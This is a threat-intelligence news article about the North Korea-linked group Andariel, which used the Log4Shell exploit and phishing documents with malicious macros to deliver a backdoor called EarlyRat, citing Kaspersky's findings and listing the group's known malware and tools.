Threat actors aligned with North Korea are known as Andariel take advantage of previously undocumented malware named EarlyRat in an attack exploiting the Log4j Log4Shell vulnerability last year.
“Andariel infects machines by executing the Log4j exploit, which, in turn, downloads further malware from a command-and-control (C2) server,” Kaspersky said in a new report.
Also called Silent Chollima and Stonefly, Andariel is associated with North Korea’s Lab 110, the main hacking unit that also houses APT38 (aka. BlueNoroff) and other subordinate elements are collectively tracked under an umbrella name Lazarus Group.
Threat actors, in addition to carrying out espionage attacks against foreign governments and military entities that have strategic interests, are known to commit cybercrimes as an additional source of income for sanctioned countries.
Some of the major cyber weapons in its arsenal include a type of ransomware known as Maui and numerous remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.
NukeSped contain set of features to create and kill processes and move, read, and write files on infected hosts. NukeSped’s use overlaps with a campaign tracked by the US Cybersecurity and Infrastructure Security Agency (CISA) under the TraderTraitor name.
Andariel’s arsenal of unpatched Log4Shell vulnerabilities in VMware Horizon servers previously documented by AhnLab Security Emergency Response Center (ASEC) and Cisco Talos in 2022.
The latest attack chain uncovered by Kaspsersky indicates that EarlyRat was spread via phishing emails containing enticing Microsoft Word documents. The file, when opened, prompts the recipient to enable macros, leading to the execution of the VBA code responsible for downloading the trojan.
Described as a simple but limited backdoor, EarlyRat is designed to collect and extract system information to remote servers and execute arbitrary commands. It also shares a high degree of similarity with MagicRAT, not to mention being written using a framework called PureBasic. MagicRAT, on the other hand, uses the Qt Framework.
Another characteristic of intrusions is the use of legitimate tools such as 3Proxy, ForkDump, NTDSDumpEx, Powerline, and Putty to further exploit the target.
“Despite being an APT group, Lazarus is known to perform typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape even more complicated,” said Kaspersky. “In addition, the group uses a wide variety of specialized tools, constantly updating existing malware and developing new malware.”